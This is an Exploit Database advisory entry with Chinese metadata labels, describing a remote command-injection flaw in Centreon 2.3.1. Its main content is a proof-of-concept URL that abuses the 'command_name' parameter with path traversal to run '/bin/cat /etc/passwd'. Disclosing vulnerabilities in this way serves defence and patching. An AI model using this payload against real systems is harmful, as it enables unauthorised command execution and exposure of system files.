Centreon 2.3.1 – ‘command_name’ Remote Command Execution

• Exploit Database
• 17 阅读

• 作者： Christophe de la Fuente
  日期： 2011-11-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36293/

• source: https://www.securityfocus.com/bid/50568/info
  
  Centreon is prone to a remote command-injection vulnerability.
  
  Attackers can exploit this issue to execute arbitrary commands in the context of the application.
  
  Centreon 2.3.1 is affected; other versions may also be vulnerable. 
  
  http://www.example.com/centreon/main.php?p=60706&command_name=/Centreon/SNMP/../../../../bin/cat%20/etc/passwd%20%23&o=h&min=1